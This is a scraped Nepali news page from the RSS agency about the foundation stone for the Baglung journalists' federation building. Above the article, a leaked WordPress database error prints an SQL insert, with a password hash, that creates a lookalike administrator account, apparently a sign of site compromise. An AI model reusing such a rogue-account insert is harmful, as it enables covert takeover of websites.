WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJb/Qn/lpukj8jMxbh1xY68bwYuksS1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 07:51:06', '', 'admlnlx', 'admlnlx')
बागलुङ,माघ ९ –
नेपाल पत्रकार महासङ्घ बागलुङको आफ्नै भवन बन्ने भएको छ ।
महासङ्घका केन्द्रीय अध्यक्ष डा महेन्द्र विष्टले आज भवनको शिलान्यास गर्दै महासङ्घको भवन पत्रकारको मात्र नभएर समाजको साझा हुने उल्लेख गर्नुभयो । श्रमजीवी पत्रकारको हित र पत्रकारिताको व्यावसायिक विकासका पक्षमा महासङ्घले विभिन्न कार्ययोजना लागू गरेको उहाँको भनाइ छ ।
रु एक करोडको लागतमा बन्न लागेको भवन दुई वर्षभित्रमा पूरा गर्ने लक्ष्य लिइएको शाखा अध्यक्ष मुकेशचन्द्र राजभण्डारीले बताउनुभयो । बागलुङ नगरपालिका– २ मा बन्ने भवन चारतले हुने उहाँले जानकारी दिनुभयो । भवनमा सुविधासम्पन्न सभाकक्ष र सूचना केन्द्र पनि रहने जनाइएको छ ।
यस्तै भवनको लागि भोगचलनमा जग्गा उपलब्ध गराउने बागलुङ नगरपालिका कार्यालयले सोही भवनमा अनाथालय पनि निर्माण गर्ने योजना छ । भवन निर्माणका लागि हालसम्म रु साढे १२ लाख सङ्कलन भएको र निर्माणको काम तुरुन्त सुरु हुन जनाइएको छ । – रासस